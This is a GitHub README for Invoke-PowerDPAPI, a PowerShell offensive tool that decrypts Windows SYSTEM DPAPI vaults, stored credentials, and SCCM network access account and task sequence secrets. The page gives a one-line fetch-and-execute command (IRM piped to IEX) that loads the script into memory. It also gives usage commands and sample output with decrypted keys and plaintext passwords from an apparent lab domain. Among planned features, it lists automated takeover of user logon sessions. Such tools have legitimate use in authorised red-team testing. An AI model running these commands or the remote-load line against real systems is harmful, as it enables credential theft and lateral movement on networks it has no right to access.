The-Viper-One/Invoke-PowerDPAPI

Open more actions menu

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 
 
 
 
 

Repository files navigation

Invoke-PowerDPAPI

Invoke-PowerDPAPI is a PowerShell port of some SharpDPAPI and SharpSCCM functionality.

For the moment this is limited to SYSTEM level functions such as triaging SYSTEM master keys and decrypting the following secrets:

  • System Vaults
  • System Credentials
  • SCCM NAA accounts (WMI / Disk)
  • SCCM Task Sequences (WMI / Disk)

Future Updates

Not all SharpDPAPI functionality will be implemented in this port. It will be limited to functionality that fits my workflow and code that I believe can be reused in further projects.

Future updates to be completed:

  • User level DPAPI
  • Automate takeover of each user logon session and decrypt each user DPAPI secret
  • SYSTEM Certificates
  • Domain Backup key support

Requirements

❗ Invoke-PowerDPAPI must be executed in a high integrity process

Load into memory

IRM "https://raw.githubusercontent.com/The-Viper-One/Invoke-PowerDPAPI/refs/heads/main/Invoke-PowerDPAPI.ps1" | IEX

Usage

Triage Everything

Runs MachineVaults, MachineCredentials, SCCM_Disk and SCCM_WMI

Invoke-PowerDPAPI MachineTriage


Triage MachineVaults

Invoke-PowerDPAPI MachineVaults
[*] Triaging SYSTEM Vaults

[*] Triaging Vault Folder: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28

  VaultID            : 4bf4c442-9b8a-41a0-b380-dd4a704ddb28
  Name               : Web Credentials 
    guidMasterKey    : {e922342f-143e-4b65-a25b-e83354a47007}
    size             : 324
    flags            : 0x20000000 (CRYPTPROTECT_SYSTEM)
    algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)
    description      : 
    guidMasterKey    : 
    size             : 324
    flags            : 0x20000000 (CRYPTPROTECT_SYSTEM)
    algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)
    description      : Vault Policy Key
    aes128 key       : 17D5264E849A7136427830A4835B8669
    aes256 key       : 428397F3F8260174A5923BC66CC014CB2D3C4ABAFB5FFBC90D7A959DC4DC817C


Triage MachineCredentials

Invoke-PowerDPAPI MachineCredentials
[*] Triaging System Credentials

Folder       : C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials

  CredFile           : 3F38B7EDDCC210906994CAC4A9077348
    guidMasterKey    : {8173b631-3636-4c96-81e7-ae2c8fd60632}
    size             : 544
    flags            : 0x20000000 (CRYPTPROTECT_SYSTEM)
    algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)
    description      : Local Credential Data

    guidMasterKey    : 
    size             : 264
    flags            : 0x00000030 (CRYPTPROTECT_SYSTEM)
    algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)
    description      : Local Credential Data
    LastWritten      : 6/19/2025 12:18:59 AM
    TargetName       : Domain:batch=TaskScheduler:Task:{52340B14-C919-4223-970B-103AAAFE2720} 
    TargetAlias      : 
    Comment          : 
    UserName         : ludus\domainuser 
    Credential       : password


Triage SCCM (WMI and Disk)

Runs SCCM_WMI and SCCM_Disk

Invoke-PowerDPAPI SCCM


Triage SCCM (WMI)

Invoke-PowerDPAPI SCCM_WMI
Invoke-PowerDPAPI SCCM_WMI -SaveTS # Saves Task Sequences in XML format to PWD
[+] Found 1 Network Access Account(s)
[+] Decrypting network access account credentials

    guidMasterKey    : {8173b631-3636-4c96-81e7-ae2c8fd60632}
    size             : 266
    flags            : 0x00000000
    algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)
    description      :  
    guidMasterKey    : {8173b631-3636-4c96-81e7-ae2c8fd60632}
    size             : 250
    flags            : 0x00000000
    algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)
    description      :  


    Network Access Username: ludus\sccm_naa_2 
    Network Access Password: password123 

[+] Found 2 Task Sequence(s)
[+] Decrypting Task Sequences

    guidMasterKey    : {8173b631-3636-4c96-81e7-ae2c8fd60632}
    size             : 8042
    flags            : 0x00000000
    algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)
    description      :  

[+]    Task Sequence: 
<sequence version="3.10">
  <step type="SMS_TaskSequence_RunCommandLineAction" name="Run SQL CMD" description="" runIn="WinPEandFullOS" successCodeList="0 3010" retryCount="0" runFromNet="false">
    <action>smsswd.exe /run: sqlcmd -S myserver.database.windows.net -d MyDatabase -U MyUserName -P MySecretPassword -Q "SELECT TOP 10 * FROM dbo.MyTable"</action>
    <defaultVarList>
      <variable name="CommandLine" property="CommandLine" hidden="true">sqlcmd -S myserver.database.windows.net -d MyDatabase -U MyUserName -P MySecretPassword -Q "SELECT TOP 10 * FROM dbo.MyTable"</variable>
      <variable name="SMSTSDisableWow64Redirection" property="DisableWow64Redirection">false</variable>
      <variable name="SMSTSRunCommandLineOutputVariableName" property="OutputVariableName">
      </variable>
      <variable name="_SMSTSRunCommandLineAsUser" property="RunAsUser">false</variable>
      <variable name="SuccessCodes" property="SuccessCodes" hidden="true">0 3010</variable>
    </defaultVarList>
  </step>
</sequence>


Triage SCCM (Disk)

Invoke-PowerDPAPI SCCM_Disk
Invoke-PowerDPAPI SCCM_Disk -SaveTS # Saves Task Sequences in XML format to PWD
[+] Decrypting 1 network access account secrets
    guidMasterKey    : {8173b631-3636-4c96-81e7-ae2c8fd60632}
    size             : 266
    flags            : 0x00000000
    algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)
    description      :  
    guidMasterKey    : {8173b631-3636-4c96-81e7-ae2c8fd60632}
    size             : 250
    flags            : 0x00000000
    algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)
    description      :  

    NetworkAccessUsername: ludus\sccm_naa_2 
    NetworkAccessPassword: password123 

[+] Decrypting 1 task sequence secrets
    guidMasterKey    : {8173b631-3636-4c96-81e7-ae2c8fd60632}
    size             : 2154
    flags            : 0x00000000
    algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)
    description      :  

<sequence version="3.10">
  <step type="SMS_TaskSequence_RunCommandLineAction" name="Run SQL CMD" description="" runIn="WinPEandFullOS" successCodeList="0 3010" retryCount="0" runFromNet="false">
    <action>smsswd.exe /run: sqlcmd -S myserver.database.windows.net -d MyDatabase -U MyUserName -P MySecretPassword -Q "SELECT TOP 10 * FROM dbo.MyTable"</action>
    <defaultVarList>
      <variable name="CommandLine" property="CommandLine" hidden="true">sqlcmd -S myserver.database.windows.net -d MyDatabase -U MyUserName -P MySecretPassword -Q "SELECT TOP 10 * FROM dbo.MyTable"</variable>
      <variable name="SMSTSDisableWow64Redirection" property="DisableWow64Redirection">false</variable>
      <variable name="SMSTSRunCommandLineOutputVariableName" property="OutputVariableName">
      </variable>
      <variable name="_SMSTSRunCommandLineAsUser" property="RunAsUser">false</variable>
      <variable name="SuccessCodes" property="SuccessCodes" hidden="true">0 3010</variable>
    </defaultVarList>
  </step>
</sequence>


About

Decrypt SCCM and DPAPI secrets with Powershell.
